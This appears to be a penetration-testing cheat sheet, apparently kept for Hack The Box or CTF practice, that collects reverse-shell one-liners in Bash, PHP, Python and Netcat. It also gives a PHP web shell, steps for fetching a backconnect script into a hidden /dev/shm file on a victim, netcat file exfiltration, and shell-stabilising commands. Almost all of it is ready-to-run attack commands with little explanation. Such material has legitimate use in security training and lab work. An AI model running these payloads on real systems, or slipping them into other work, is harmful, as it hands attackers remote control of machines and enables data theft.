Reverse Shell
Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php system($_GET['cmd']); ?>
echo system($_REQUEST['cmd']); #Add the php tags
/file.php?cmd=whoami
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python-pty-shells
https://github.com/infodox/python-pty-shells
Edit tcp_pty_backconnect.py
On Victim
wget IP:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
On Attacker
python tcp_pty_shell_handler.py -b IP:PORT
On Victim
python /dev/shm/.rev.py
Netcat
nc -e /bin/sh 10.0.3.4 9001
Listen with
nc -lvnp 9001
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Downloading files with netcat
Open receiving connection
nc -lvnp 1234 > file.zip
Send the file over
nc -w 4 <your_hackthebox_ip> 1234 < file_name.zip
MSFvenom
Improving Shells
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null
echo os.system('/bin/bash')
/bin/sh -i
Once bash is running in the PTY, background the shell with Ctrl-Z
While the shell is in the background, now examine the current terminal and STTY
echo $TERM
stty -a
stty raw -echo
fg
Set the shell, terminal type and stty size to match our current Kali window (from the info gathered above)
reset
$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 38 columns 116